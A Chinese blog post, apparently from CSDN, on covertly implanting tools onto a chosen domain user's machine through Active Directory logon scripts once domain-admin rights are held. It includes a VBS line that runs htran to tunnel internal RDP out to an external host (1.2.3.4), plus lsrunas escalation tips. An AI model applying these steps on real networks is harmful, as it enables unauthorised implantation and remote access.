cmd 域用户加入域管理员组_刚才都是假象,这才是技术档。也谈域内指定用户植入取证。...

最新推荐文章于 2021-06-16 05:47:54 发布
最新推荐文章于 2021-06-16 05:47:54 发布
阅读量364 收藏
点赞数
文章标签: cmd 域用户加入域管理员组
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39625782/article/details/111673939
版权

0x0

工作中,我们拿到域服务器管理员权限就可以对域内任意机器进行植入。有时我们只知道目标的用户名,但是无法判断他在哪台机器上面登录,若是通过bginfo对域登陆事件进行分析提取IP的话,需要花费很大的精力。因此,我们通常使用域的用户登录脚本来实现定向植入。这里需要注意的是,当域用户在本机属于power users组以下权限时是无法运行可执行文件的,因此我们基本上都需要用到lsrunas.exe工具来提权植入。

0x1

如何为一个域用户设置登陆脚本?

开域的netlogon共享。

9b97b5d68ab3230045e3a3c58ed1d620.png

将我们需要使用的工具和取证服务端放到该目录,修改文件权限everyone完全控制权限。

%systemroot%\sysvol\sysvol\domainname\scripts

%systemroot%\sysvol\sysvol\domainname\policies\guid\user(machine)\scripts

是两个默认路径。

然后我们针对需要植入的域用户配置域用户登录脚本。

这里需要注意,取证服务端的路径应该以\\server\……这样的路径形式,域用户在登陆的时候执行脚本是从域服务器上下载到本地执行的。

30c26ccf07d4e882e6c5558a516232ee.png

配置完成后,必须在命令行下用与管理员输入gpupdate /force强制刷新组策略生效。

注意:使用vbs脚本编写命令时需要注意,需要在objshell.Run””添加命令时如果想要使用双引号,一定要把命令使用双引号双层嵌套。

例如:

Objshell.run”cmd.exe /c “”htran.exe –p –slave 1.2.3.4 80 192.168.1.1 3389”””

本来我们的cmd.exe /c 后面之需要一层双引号,但是我们为了让vbs语句正常使用,必须要再使用一次。

weixin_39625782
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
lsrunas 命令行工具
03-01
参考程序注释
使用Runas,告别我心中永远的痛
weixin_33713350的博客
12-18 237
  使用windows的系统管理员,经常需要用到Runas方式来运行特定的应用程序,如希望以不同的权限登录windows管理控制台。但是windows自带的Runas有一个很不方便的地方,用户必须手动的输入密码。很多系统管理员都希望有一个能够无缝的使用Runas功能的方式。 今天我们要介绍的主角,LSrunas,它是一款完全免费的软件。我使用它最大的好处就是简化了密码的输入。下载地址:...
[转载]自动输入RUNAS 密码的方法
weixin_34419326的博客
10-09 894
以非管理员用户登录时,如果要用管理员权限运行程序的话,需要用到 runas 命令,在使用脚本运行时,无法简单的利用管道来输入密码,有以下方法可免除每次需要输入密码的麻烦。 1、使用系统自带的 runas /savecred 选项,第一次输入密码后,会保存凭据。 特点:无法限制能够运行的命令,安全性差。 2、使用 sanur,sanur 是一个小程序,能以管道的方法将...
可以自动输入密码的Runas
weixin_33845881的博客
07-23 811
  一 Runas 在使用批处理实现自动化的工程中,我们也许会遇到某些操作必须要在拥有权限的某个用户下才能执行。但是这时windows自带的Runas在批处理中调用时不能完成自动输入密码。 这时需要使用免费的第三方工具:   1)lsrunas (http://www.moernaut.com/default.aspx?item=lsrunasLSrunas can be used ...
Active_Directory--用户账户的管理实用.pdf
03-03
添加用户是 Active Directory 中的一项基本操作,管理员可以通过多种方式添加用户,包括直接在根 DC 里新建用户、使用目录服务工具添加用户和使用 CMD 命令导入用户信息等。 1.1 直接在根 DC 里新建用户 管理...
AD批量新建用户.docx
03-18
随着织规模的扩大,用户数量也随之增长,如何高效地管理这些用户成为了一项挑战。本文将详细介绍如何通过脚本的方式批量创建AD用户,从而大幅提高工作效率。 #### 二、创建用户面临的挑战 对于大多数企业来...
Active_Directory--用户账户的管理归纳.pdf
01-14
织单元(OU)是AD中的逻辑容器,可进行委派控制,允许非管理员对OU内的对象执行特定管理任务。例如,将用户账户的创建和管理权委派给特定的部门经理。 四、AGDLP原则 AGDLP(Account-Group-DL-Policy)是一种...
linux-cmd.zh.zip_Linux shell_linu cmd zh_linux_cmd.zh_linux_cmd_
07-14
Linux系统常用命令文参考手册。 分门别类, 很适合查询。
dsp-cmd.rar_.cmd dsp_DSP程序_cmd_dsp_dsp c++
09-21
程序是对16位dsp的cmd文件标准配置,dsp cmd文件是dsp程序是否能够稳定运行的条件
替代Windows的runas的好工具Lsrunas
11-23
经过测试确实可以用,先将lsrunas.exe拷贝到%windir%下面,然后参照下面的命令写批处理。 LSrunas can be used to run a command using another user account and passing the password as a parameter. This is a big improvement over the standard runas tool which is not able to accept a password. LSrunas can be used in scripts. Parameters: ----------- /user: specifies the username /password: specifies the password /domain: specifies the domain /command: specifies the command to execute and the parameters /runpath: specifies the path where the command should start Examples: --------- lsrunas /user:administrator /password:s3cr3tp@ssw0rd /domain:Mydomain /command:notepad.exe /runpath:c:\ lsrunas /user:administrator /password:s3cr3tp@ssw0rd /domain:Mydomain /command:"C:\Program Files\Internet Explorer \iexplore.exe" /runpath:c:\ lsrunas /user:administrator /password:s3cr3tp@ssw0rd /domain:Mydomain /command:"C:\Program Files\Internet Explorer \iexplore.exe http://www.google.be" /runpath:c:\
官方版:代替runaslsrunas增强版lsrunase
01-11
非常好用的替代runas的工具,可以加密administor密码
lsrunase,lsrunas的加强版本,完美替代runas
08-03
使用 lsrunase,lsrunas 的加强版本,完美替代runas,可保存密码。 优点:可以较完美的替代runas,并避免直接将密码明文保存在脚本中。 使用方法: 1、用LSencrypt 用来生成administrator密码的加密字符串S1。 2、用命令 lsrunase /user:administrator /password:41BngA== /domain: /command:notepad.exe /runpath:c:\ 以管理员运行。 所有的参数必须齐全,其中: user 为运行的账号 password 为密码加密后的字串 domain 为机器名或名,也可留空代表本机 command 为要运行的程序名,如果携带参数需要在命令的首尾加引号 runpath 为程序启动的路径
lsrunase 加强版 lsrunas升级版 完美替代runas
07-30
这个是增强版,看好了,绝版的好东西。 使用 lsrunase,lsrunas 的加强版本,可以使用加密的密码。自带一个小软件 LSencrypt 用来生成加密的字串。 用法: lsrunase /user:administrator /password:41BngA== /domain: /command:notepad.exe /runpath:c:\ 所有的参数必须齐全,其中: user 为运行的账号 password 为密码加密后的字串 domain 为机器名或名,也可留空代表本机 command 为要运行的程序名,如果携带参数需要在命令的首尾加引号 runpath 为程序启动的路径 特点:可以较完美的替代 runas,并避免直接将密码明文保存在脚本中
lsrunase/如何用批处理实现以管理员的权限让用户管理员运行特定程序!
热门推荐
ArchVillian的博客
11-04 1万+
   在某些情况下,为了安全起见,大部分公司都会使用控制器或只会给员工电脑user的用户权限,这样做能大大提高安全性和可控性,但由此也带来了一些困扰。比如:某些特定的部门(如财务,物流)没有管理员权限,但工作又需要使用特定的插件或程序,且该程序或插件又必须以管理员身份运行,在这种情况下,我们如果将用户的权限提升为管理员,那样会增加安全风险而且可能引起很多不可控的情况。    这个时候我们就需要...
runas 命令的使用及RUNAS自动输入密码的方法
weixin_34034670的博客
11-04 3416
在win2k中,开始→程序→附件 ,找到计算器,按住shift键,点右键,选择“运行方式 ...”,这时候,会弹出对话框,询问你要使用哪个用户身份来运行该程序 。 不知道大家是否使用过win2k的这个功能,如果大家是使用win2k的英文版本的话,在按住shift后选择的就不是“运行方式 ...”而是“runas...”,也就是今天要讲的这个命令。 在cmd中输入runas...
计算机换用户无法启动软件吗,用户权限不够无法运行程序的解决方法 -电脑资料...
weixin_28930803的博客
06-16 437
一、Runas命令通过系统自带的Runas命令可以实现以其它用户权限来启动程序的功能,缺点是必需手动输入用户 密码,在本故障中,本方法不适用,runas /user:(用户) (命令)二、第三方工具“LSrunase”来达成目标。使用本工具可以在命令行中加入用户密码参数运行,因此可以设计批处理程序运行此工具来实现 自动调用其它用户权限运行程序的目的。此工具包中有三个程序,其中“lsrunas.ex...
取带runas的一些优秀小工具介绍
冷风
10-11 8636
2、使用 sanur,sanur 是一个小程序,能以管道的方法将密码或者文件中的内容传递给 runas 程序。runas | sanur passwordrunas | sanur /i [drive:][path]filename特点:密码明文保存。----------------------------------About SanurSanur is a tiny Win32 console
window如何通过cmd创建用户加入管理员
最新发布
06-10
通过cmd在Windows中创建用户加入管理员,可以按照以下步骤进行操作: 1. 以管理员身份运行命令提示符(cmd)。 2. 创建新用户,使用以下命令: ``` net user <username> <password> /add ``` 其中,`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值